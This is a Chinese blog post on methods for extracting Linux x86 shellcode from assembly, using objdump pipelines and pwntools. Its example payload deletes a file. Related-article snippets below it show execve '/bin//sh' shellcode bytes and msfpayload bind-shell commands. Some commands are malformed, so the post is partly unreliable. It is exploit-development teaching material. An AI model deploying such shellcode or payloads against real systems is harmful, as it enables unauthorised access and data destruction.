Linux汇编shellcode,从汇编生成shellcode的n种方法

最新推荐文章于 2022-05-26 13:41:32 发布
最新推荐文章于 2022-05-26 13:41:32 发布
阅读量289 收藏
点赞数
文章标签: Linux汇编shellcode

第一种,添加asm代码到c中,然后gcc编译生成可执行代码,最后objdump:

void main() {

asm{

}

}

太麻烦,这里就不详细介绍了,基本上包含在第二种方法中

第二种,直接用NASM或者GAS生成elf文件,然后objdump:

nasm -f elf print.asm

ld -m elf_i386 -o print print.asm

as test.asm -o test.o

ld test.asm -o test

objdump生成shellcode:

objdump -d print2

grep “^ ”

cut -d$’\t’ -f 2

tr ‘\n’ ‘ ‘

sed -e ‘s/ *$//’

sed -e ‘s/ +/\x/g’

awk ‘{print “\x”$0}’

关于NASM和GAS的区别可以看:

https://www.ibm.com/developerworks/library/l-gas-nasm/

第三种,使用pwntools(https://github.com/Gallopsled/pwntools#readme)

example:

from pwn import *

code = """.global _start

_start:

jmp test1

test2:

pop ebx

mov al, 0xa

int 0x80

mov al, 0x1

xor ebx, ebx

int 0x80

test1:

call test2

.string "delfile" """

context(arch='x86', os='linux', endian='little', word_size=32)

shellcode = asm(code).encode('hex')

re = ''

while len(shellcode):

re += r'\x'+shellcode[:2]

shellcode = shellcode[2:]

print re

未完待补充

weixin_39761880
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
汇编shellcode形式
01-15
本程序开发环境为VC6.0,将汇编语言为C语言或unicodeshellcode形式并保存在记事本中。
生成shellcode
ooyyee的专栏
11-02 2000
使用Release模式。近来编译器的Debug模式可能产生逆序的函数,并且会插入许多与位置相关的调用。 禁用优化。编译器会默认优化那些没有使用的函数,而那可能正是我们所需要的。 禁用栈缓冲区安全检查(/Gs)。在函数头尾所调用的栈检查函数,存在于二进制文件的某个特定位置,导致输出的函数不能重定位,这对shellcode是无意义的。 以上为在vs中的设置. #include
Shellcode生成和利用
qq_43390703的博客
03-08 4951
from pwn import * #pwntool生成shellcode shellcode=asm(shellcraft.sh()) shellcode = “\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05”(23字节) ...
汇编shellcode的过程
Tesi1a的充电桩
09-28 2094
汇编代码如下:section .text global _start _start: jmp shell here: xor rax,rax pop rdi xor rsi,rsi xor rdx,rdx add rax,59 syscall shell: call here bash db "/bin//sh"编译执行过程如下
汇编代码提取Shellcode的简单实现
oceanark的博客
07-13 1791
#include unsigned char *asm_code() { __asm {    lea eax,__code    jmp __ret } //这里放shellcode汇编代码 //------------------------------------------------------------------------------------
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
最新发布
09-20
在IT领域,shellcode是一特殊的低级代码,通常用汇编语言编写,用于利用软件漏洞进行攻击。在本例中,我们关注的是针对Linux x86架构的shellcodeshellcode的主要目标是获取一个shell,即操作系统命令解释器的...
shellcoder:从可执行文件或汇编代码创建shellcode
02-05
Shellcode是一特殊的低级代码,通常用汇编语言编写,用于在目标系统上执行特定操作,比如打开一个命令行shell。在黑客攻击中,shellcode常被用作exploit的一部分,利用程序漏洞来获取对目标系统的控制权。...
shellcode中文手册汇编.pdf
10-08
( shellcode中文手册汇编.pdf ) 更多见:http://pan.baidu.com/wap/share/home?uk=1023919189
利器!schelper151_shellcode为64位汇编32位汇编(包密码为123)
02-10
shellcode为64位汇编32位汇编 也可以将64位汇编32位汇编为各类型的shellcode,利器!! 例如我要将C语言数组类型的shellcode化为64位汇编,命令为: schelper.exe -i c.txt -s 0 -d 27 -dp x64 其中把...
手动制作shellcode
fanghuapyk的博客
03-19 594
概括: 我们要将自己生成shellcode汇编文件,编译为.o文件,然后再编译为可执行文件,然后将可执行文件中的有用的代码段单独复制出来,最后我们利用python脚本将我们的这一个文件发送到测试的程序中去 一:准备shellcode文件 1将汇编代码文件shellcode_32.Asm中代码编译为shellcode_32.o文件 命令为:nasm -f elf32 -o shellcode_32.o shellcode_32.asm push 0x68 push 0x732f2f2f push 0x6e6
最短shellcode提取方法和测试【原创】
12-13
这是一个windows弹出对话框的shellcode,38个字节 在windows xp sp3下测试 已在vc++6,mingw,cygwin下编译测试
一段动态装载DLL的ShellCode汇编代码
09-10
一段动态装载DLL的ShellCode汇编代码,不需要引入任何的库
linux 生成shellcode,书写Linux下自己的shellcode
weixin_36192634的博客
05-13 114
: movl 0x10(%ebp),%edx将NULL的地址赋给edx0x80002ce : int $0x80产生系统调用,进入核心态运行.------------------------------------------------------------------------------------看了上面的代码,现在我们可以把它精简为下面的汇编语言程序:leal string,stri...
linux编写shellcode
duangduang2020的博客
11-21 1033
1、shellcode需要用到系统调用的调用号,可以通过unistd.h查看,具体某个系统调用的用法可以通过man syscall来查看 2、在现在的指令集中引入了syscall指令,但是原来的int 0x80调用正常可以使用。int 0x80调用将系统调用号放在eax, 参数依次放在ebx, ecx, edx, esi, edi;超过5个的将参数放在内存中,并将内存地址放在ebx寄存器中。 (
linux汇编提取shellcode相关知识点
u010857292的博客
05-04 529
一、64位寄存器需要注意的    1.用户模式的系统调用依次传递的寄存器为:         rdi,rsi,rdx,rcx,r8和r9;     2.内核接口的系统调用一次传递的寄存器为:         rdi,rsi,rdx,r10,r8和r9;注意这里和用户模式的系统调用只有第4个寄存器不同,其他都相同。     3.系统调用通过syscall指令进入,不像32位下的汇编使用的是int 0...
如何生成stage shellcode
thesum的专栏
02-06 741
1.进入kaili 运行msfpayload -l 就可以列举shellcode 2.运行msfpayload -l|grep "windows"|grep "bind" 就可以找到想要的shellcode 3.运行 msfpayload windows/dllinject/bind_tcp o 就可以查看该shellcode的参数 4.运行msfpayload windows/dlli
【Pwn】手动制作shellcode并测试
weixin_52553215的博客
05-26 444
1.测试shellcode的代码:shellcode_32.c 编译生成shellcode_test(注意取消NX保护,32、64位要区分) 2.shellcode_32.asm源码 3. (1)使用汇编器nasm把shellcode_32.asm编译成shellcode_32.o文件 (2)shellcode_32.o链接生成可执行文件shellcode_32_exe(可省略) (3)从 shellcode_32.o或shellcode_32_exe 提取code段,生成shell..
linux shellcode汇编,shellcode换为汇编代码的方法
weixin_42515842的博客
05-16 374
0x00 shellcode这段是楼主最近在看历史中的exp时发现的shellcode,功能是弹计算器,在09年时使用很广泛,但是没有找到相关的分析文献,准备有时间研究下。0xdb 0xc0 0x31 0xc9 0xbf 0x7c 0x16 0x70 0xcc 0xd9 0x74 0x24 0xf4 0xb1 0x1e 0x58 0x31 0x78 0x18 0x83 0xe8 0xfc 0x03...
java 加载shellcode_ShellCode的编写入门
weixin_39630140的博客
02-26 276
因此WinExec真正的地址是7C8623AD,注意,这里是要反过来读取。三、现在有了汇编模样的语句和WinExec的地址,接下来就是要化为具有Shellcode汇编代码。在汇编时先了解汇编下面是如何完成一个函数调用的:1、父函数将函数的实参按照从右至左顺序压入堆栈;2、CPU将父函数中函数调用指令Call XXXXXXXX的下一条指令地址EIP压入堆栈;3、父函数通过Push Ebp将基...
ARM汇编基础与Shellcode编写实战
在计算机安全领域,SHELLCODE是一小型的、通常由汇编语言编写的代码,用于在成功执行一个漏洞利用后获取目标系统的控制权。这篇文档特别关注的是在ARM架构上编写SHELLCODE,这是一广泛应用于移动设备、路由器、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值